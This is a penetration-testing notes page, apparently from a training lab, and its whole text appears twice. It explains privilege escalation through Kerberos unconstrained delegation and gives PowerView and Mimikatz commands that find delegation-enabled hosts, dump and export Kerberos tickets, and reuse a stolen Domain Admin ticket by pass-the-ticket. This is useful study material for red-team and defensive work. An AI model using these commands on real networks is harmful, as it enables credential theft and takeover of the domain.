Priv Esc – Unconstrained Delegation

PreviousPriv Esc - Constrained Delegation NextPriv Esc - Targeted Kerberoasting - Set SPN

Last updated 4 years ago

Was this helpful?

Priv Esc – Unconstrained Delegation

Kerberos Delegation allows to "reuse the end-user credentials to access resources hosted on a different server".
This is typically useful in multi-tier service or applications where Kerberos Double Hop is required.
For example, users authenticates to a web server and web server makes requests to a database server. The web server can request access to resources (all or some resources depending on the type of delegation) on the database server as the user and not as the web server's service account.
Please note that, for the above example, the service account for web service must be trusted for delegation to be able to make requests as a user.

Kerberos Unconstrained Delegation

When set for a particular service account, unconstrained delegation allows delegation to any service to any resource on the domain as a user.
When unconstrained delegation is enabled, the DC places user's TGT inside TGS (Step 4 in the previous diagram). When presented to the server with unconstrained delegation, the TGT is extracted from TGS and stored in LSASS. This way the server can reuse the user's TGT to access any other resource as the user.
This could be used to escalate privileges in case we can compromise the computer with unconstrained delegation and a Domain Admin connects to that machine.

#Discover domain computers which have unconstrained delegation enabled using PowerView:
Get-NetComputer -UnConstrained


#Using ActiveDirectory module:
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}


#Compromise the server(s) where Unconstrained delegation is enabled.
#Run following command on it to check if any DA token is available:
Invoke-Mimikatz –Command '"sekurlsa::tickets"'


#We must trick or wait for a domain admin to connect a service on appsrv.
#Now, if the command is run again:
Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'
 

#The DA token could be reused:
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

PreviousPriv Esc - Constrained Delegation NextPriv Esc - Targeted Kerberoasting - Set SPN

Last updated 4 years ago

Was this helpful?

Kerberos Delegation allows to "reuse the end-user credentials to access resources hosted on a different server".
This is typically useful in multi-tier service or applications where Kerberos Double Hop is required.
For example, users authenticates to a web server and web server makes requests to a database server. The web server can request access to resources (all or some resources depending on the type of delegation) on the database server as the user and not as the web server's service account.
Please note that, for the above example, the service account for web service must be trusted for delegation to be able to make requests as a user.

Kerberos Unconstrained Delegation

When set for a particular service account, unconstrained delegation allows delegation to any service to any resource on the domain as a user.
When unconstrained delegation is enabled, the DC places user's TGT inside TGS (Step 4 in the previous diagram). When presented to the server with unconstrained delegation, the TGT is extracted from TGS and stored in LSASS. This way the server can reuse the user's TGT to access any other resource as the user.
This could be used to escalate privileges in case we can compromise the computer with unconstrained delegation and a Domain Admin connects to that machine.

#Discover domain computers which have unconstrained delegation enabled using PowerView:
Get-NetComputer -UnConstrained


#Using ActiveDirectory module:
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}


#Compromise the server(s) where Unconstrained delegation is enabled.
#Run following command on it to check if any DA token is available:
Invoke-Mimikatz –Command '"sekurlsa::tickets"'


#We must trick or wait for a domain admin to connect a service on appsrv.
#Now, if the command is run again:
Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'
 

#The DA token could be reused:
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'